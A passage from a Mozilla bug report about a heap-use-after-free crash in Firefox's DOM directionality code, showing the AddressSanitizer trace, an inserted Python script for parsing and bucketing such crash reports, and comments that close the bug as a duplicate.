#28 0x7fca57aadb37 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#29 0x7fca5840ba5f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#30 0x7fca5840ba5f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134
#31 0x7fca5840d863 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
#32 0x7fca583ee40a in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:488:14
#33 0x7fca583f1522 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9
#34 0x7fca583c072a in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:894:12
#35 0x7fca567679f1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1337:5
#36 0x7fca5839930b in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:12
#37 0x7fca562c82ef in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5407:15
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1603:12 in GetBoolFlag
Shadow bytes around the buggy address:
==8773==ABORTING
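Added example (not from the bug report or from Mozilla's tooling): a small triage parser for ASan heap-use-after-free reports of the shape shown above. It pulls out the faulting-access, free and allocation stacks, skips allocator and sanitizer-runtime frames, and derives a bucketing signature; the embedded report is a constructed, abridged copy of the trace above with paths shortened and frames dropped.

```python
"""ASan heap-use-after-free triage helper (added example, not Mozilla's tooling):
parses the use, free and allocation stacks out of a report, skips allocator and
sanitizer frames, and builds a signature for bucketing fuzzer crashes."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# A stack frame: "#3 0x7fca5647c26f in mozilla::Foo(bar*, bool) dom/base/x.cpp:666:12"
FRAME_RE = re.compile(r"^#(\d+)\s+0x[0-9a-fA-F]+\s+in\s+(.*?)\s+(\S+)$")
HEADER_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-fA-F]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-fA-F]+ thread (T\d+)")
REGION_RE = re.compile(r"is located (\d+) bytes inside of (\d+)-byte region")
# Allocator and sanitizer-runtime frames carry no triage information.
RUNTIME_EXACT = {"malloc", "free", "calloc", "realloc", "operator new", "operator delete", "moz_xmalloc"}
RUNTIME_PREFIXES = ("__interceptor_", "__asan_")

Frame = namedtuple("Frame", "index function location")  # function: symbol without parameter list

@dataclass
class UafReport:
    kind: str = ""
    address: str = ""
    access: str = ""
    offset: int = -1  # byte offset of the access inside the freed object
    size: int = -1    # size of the freed object
    use: list = field(default_factory=list)
    free: list = field(default_factory=list)
    alloc: list = field(default_factory=list)

def short_name(symbol):
    """'ns::F(int, bool)' -> 'ns::F'; leaves 'operator new' and thunk names intact."""
    return symbol.split("(", 1)[0].strip()

def is_runtime(frame):
    return frame.function in RUNTIME_EXACT or frame.function.startswith(RUNTIME_PREFIXES)

def parse_asan_report(text):
    """State machine over the report: frame lines go to whichever stack was opened last."""
    report, current = UafReport(), None
    for raw in text.splitlines():
        line = raw.strip()
        if m := HEADER_RE.search(line):
            report.kind, report.address = m.group(1), m.group(2)
        elif m := ACCESS_RE.match(line):
            report.access = f"{m.group(1)} of size {m.group(2)} in thread {m.group(3)}"
            current = report.use
        elif m := REGION_RE.search(line):
            report.offset, report.size = int(m.group(1)), int(m.group(2))
        elif line.startswith("freed by thread"):
            current = report.free
        elif line.startswith("previously allocated by thread"):
            current = report.alloc
        elif line.startswith("SUMMARY:"):
            current = None
        elif (m := FRAME_RE.match(line)) and current is not None:
            current.append(Frame(int(m.group(1)), short_name(m.group(2)), m.group(3)))
    return report

def first_program_frame(stack):
    """Innermost frame that belongs to the program rather than to malloc or ASan."""
    return next((f for f in stack if not is_runtime(f)), None)

def signature(report, depth=3):
    """Bucketing key: bug kind, top program frames of the use stack, free site, alloc site."""
    use_frames = [f for f in report.use if not is_runtime(f)][:depth]
    free_site, alloc_site = first_program_frame(report.free), first_program_frame(report.alloc)
    return "|".join([report.kind, ">".join(f.function for f in use_frames),
                     free_site.function if free_site else "?",
                     alloc_site.function if alloc_site else "?"])

# Constructed, abridged copy of the report in the bug above (paths shortened, frames dropped).
SAMPLE_REPORT = """\
==8773==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0004220e0 at pc 0x7fca5647c270
READ of size 4 at 0x60d0004220e0 thread T0
    #0 0x7fca5647c26f in GetBoolFlag dom/base/nsINode.h:1603:12
    #1 0x7fca5647c26f in HasTextNodeDirectionalityMap dom/base/nsINode.h:1690
    #2 0x7fca5647c26f in RemoveElementFromMap dom/base/DirectionalityUtils.cpp:556
    #3 0x7fca5647c26f in mozilla::WalkAncestorsResetAutoDirection(mozilla::dom::Element*, bool) dom/base/DirectionalityUtils.cpp:666
0x60d0004220e0 is located 48 bytes inside of 136-byte region [0x60d0004220b0,0x60d000422138)
freed by thread T0 here:
    #0 0x4bb44b in __interceptor_free compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7fca53c95f57 in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2665:25
previously allocated by thread T0 here:
    #0 0x4bb79c in malloc compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fca5a96eaae in operator new dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fca5a96eaae in nsGfxButtonControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) layout/forms/nsGfxButtonControlFrame.cpp:63
SUMMARY: AddressSanitizer: heap-use-after-free dom/base/nsINode.h:1603:12 in GetBoolFlag
"""
```

The offset/size pair (48 bytes into a 136-byte object here) is what tells you which field of the freed object was read, so it is worth keeping in the bucket record alongside the signature.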
Comment 2•8 years ago
This looks similar to bug 1289970.
Flags: needinfo?(bugs)
Keywords: csectype-uaf, sec-high
Comment 3•8 years ago (Assignee)
Possibly related to bug 1346590 too. This stuff probably needs several days to rewrite parts of the DirectionalityMap.
Updated•8 years ago
Group: core-security → dom-core-security
Updated•8 years ago
Flags: sec-bounty?
Comment 4•8 years ago
Olli, is there someone else we can ask to take this?
Updated•8 years ago (Assignee)
Assignee: nobody → bugs
Flags: needinfo?(bugs)
Comment 5•8 years ago (Assignee)
This looks like a dup of bug 1346590
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Updated•8 years ago
Flags: sec-bounty? → sec-bounty-
Updated•5 years ago
Group: dom-core-security
Updated•10 months ago
Keywords: reporter-external